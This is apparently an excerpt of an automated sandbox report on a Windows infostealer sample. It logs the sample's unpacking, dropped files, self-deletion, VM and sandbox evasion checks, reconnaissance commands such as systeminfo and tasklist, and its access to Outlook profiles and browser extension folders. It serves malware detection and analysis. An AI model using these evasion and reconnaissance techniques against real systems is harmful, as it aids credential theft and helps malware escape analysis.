    Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeUnpacked PE file: 0.2.O4zPA1oI9Y.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\jvgasiiUnpacked PE file: 6.2.jvgasii.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeUnpacked PE file: 9.2.DE97.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yig:W;.tls:W;.jetax:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\uegasiiUnpacked PE file: 10.2.uegasii.400000.0.unpack .text:ER;.rdata:R;.data:W;.yig:W;.tls:W;.jetax:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,11_2_00007FF7CBCA78EC
    Source: DE97.exe.2.drStatic PE information: section name: .yig
    Source: DE97.exe.2.drStatic PE information: section name: .jetax
    Source: uegasii.2.drStatic PE information: section name: .yig
    Source: uegasii.2.drStatic PE information: section name: .jetax
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_005F1540 pushad ; ret 0_2_005F1550
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00626460 push esp; ret 0_2_00626462
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00624803 push B63524ADh; retn 001Fh0_2_0062483A
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00625300 pushfd ; iretd 0_2_00625301
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_004014D9 pushad ; ret 6_2_004014E9
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_004031DB push eax; ret 6_2_004032AB
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_006B1540 pushad ; ret 6_2_006B1550
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_007E4540 push esp; ret 6_2_007E4542
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_007E28E3 push B63524ADh; retn 001Fh6_2_007E291A
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_007E33E0 pushfd ; iretd 6_2_007E33E1
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00402842 pushad ; retf F6A4h9_2_004029D1
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401065 pushfd ; retf 9_2_0040106A
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00402805 push 21CACAEFh; iretd 9_2_0040280A
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00402511 push ebp; iretd 9_2_00402523
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00403325 push eax; ret 9_2_004033F3
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00403433 pushad ; ret 9_2_004035AB
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401182 push esp; retf 9_2_0040118E
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00402A9D pushad ; retf 9_2_00402AAB
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_004012B7 push cs; iretd 9_2_004012B8
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00532578 push ebp; iretd 9_2_0053258A
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_0053286C push 21CACAEFh; iretd 9_2_00532871
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_0053131E push cs; iretd 9_2_0053131F
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00532B04 pushad ; retf 9_2_00532B12
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_005310CC pushfd ; retf 9_2_005310D1
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_005311E9 push esp; retf 9_2_005311F5
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00402842 pushad ; retf F6A4h10_2_004029D1
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00401065 pushfd ; retf 10_2_0040106A
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00402805 push 21CACAEFh; iretd 10_2_0040280A
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00402511 push ebp; iretd 10_2_00402523
    Source: O4zPA1oI9Y.exeStatic PE information: section name: .text entropy: 7.491043543257427
    Source: DE97.exe.2.drStatic PE information: section name: .text entropy: 7.536145601404052
    Source: uegasii.2.drStatic PE information: section name: .text entropy: 7.536145601404052
    Source: jvgasii.2.drStatic PE information: section name: .text entropy: 7.491043543257427

    Persistence and Installation Behavior

    barindex
    Uses ipconfig to lookup or modify the Windows network settings
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DE97.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8CAE.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jvgasiiJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uegasiiJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uegasiiJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jvgasiiJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Deletes itself after installation
    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\o4zpa1oi9y.exeJump to behavior
    Hides that the sample has been downloaded from the Internet (zone.identifier)
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jvgasii:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\uegasii:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Checks if the current machine is a virtual machine (disk enumeration)
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Found evasive API chain (may stop execution after checking mutex)
    Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_16-884
    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
    Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
    Switches to a custom stack to bypass stack traces
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeAPI/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeAPI/Special instruction interceptor: Address: 7FFDB442D584
    Source: C:\Users\user\AppData\Roaming\jvgasiiAPI/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\AppData\Roaming\jvgasiiAPI/Special instruction interceptor: Address: 7FFDB442D584
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeAPI/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeAPI/Special instruction interceptor: Address: 7FFDB442D584
    Source: C:\Users\user\AppData\Roaming\uegasiiAPI/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\AppData\Roaming\uegasiiAPI/Special instruction interceptor: Address: 7FFDB442D584
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: uegasii, 0000000A.00000002.3041161604.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
    Source: DE97.exe, 00000009.00000002.2777536515.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK`]
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401E65 rdtsc 9_2_00401E65
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F01016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_02F01016
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 431Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 933Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 692Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2388Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 3093Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2561Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 4410Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4277
    Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 9.8 %
    Source: C:\Windows\explorer.exe TID: 5692Thread sleep count: 431 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4904Thread sleep count: 933 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4904Thread sleep time: -93300s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 1176Thread sleep count: 692 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 1176Thread sleep time: -69200s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 6440Thread sleep count: 321 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3756Thread sleep count: 252 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3380Thread sleep count: 257 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5036Thread sleep count: 71 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 6948Thread sleep count: 145 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5352Thread sleep count: 115 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4904Thread sleep count: 2388 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4904Thread sleep time: -238800s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 3500Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 6436Thread sleep count: 3093 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 6436Thread sleep time: -3093000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2156Thread sleep count: 2561 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 2156Thread sleep time: -2561000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 1224Thread sleep count: 4410 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 1224Thread sleep time: -4410000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 7008Thread sleep count: 4277 > 30
    Source: C:\Windows\explorer.exe TID: 7008Thread sleep time: -4277000s >= -30000s
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\explorer.exeLast function: Thread delayed
    Source: C:\Windows\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\explorer.exeLast function: Thread delayed
    Source: C:\Windows\explorer.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00418DF0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00419024h0_2_00418DF0
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00418DF0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00419024h6_2_00418DF0
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCAFB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,11_2_00007FF7CBCAFB38
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00432B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,13_2_00432B15
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00431D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,13_2_00431D4A
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00433ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,13_2_00433ED9
    Source: C:\Windows\explorer.exeCode function: 15_2_00E330A8 FindFirstFileW,FindNextFileW,FindClose,15_2_00E330A8
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00436512 GetSystemInfo,13_2_00436512
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
    Source: explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
    Source: 9C13.tmp.13.drBinary or memory string: discord.comVMware20,11696487552f
    Source: 8CAE.exe, 0000000B.00000002.4581484598.000002404C82F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fo & echo 3284951881311361583284951881\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77086-AAOEM\r\nOriginal Install Date: 03/10/2023, 10:57:18\r\nSystem Boot Time: 25/09/2023, 08:44:03\r\nSystem Manufacturer: x26YeTxoS9PSNM\r\nSystem Model: 9rl4BeBz\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: MZZAY PO849, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'954 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'215 MB\r\nVirtual Memory: In Use: 976 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: 1TK6A\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.6\r\n [02]: fe80::1480:15d6:10aa:6464\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n3284951881311361583284951881\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>GsaZnKyRMbnKXWqcpbcKkwDFLASmpJQKNxBgRoaOCNp\QZjUDmOzUXKGQ.exe,3524
    Source: explorer.exe, 00000002.00000000.2219776484.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
    Source: 9C13.tmp.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
    Source: explorer.exe, 00000002.00000000.2216587269.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2219404532.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3226508578.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: 9C13.tmp.13.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
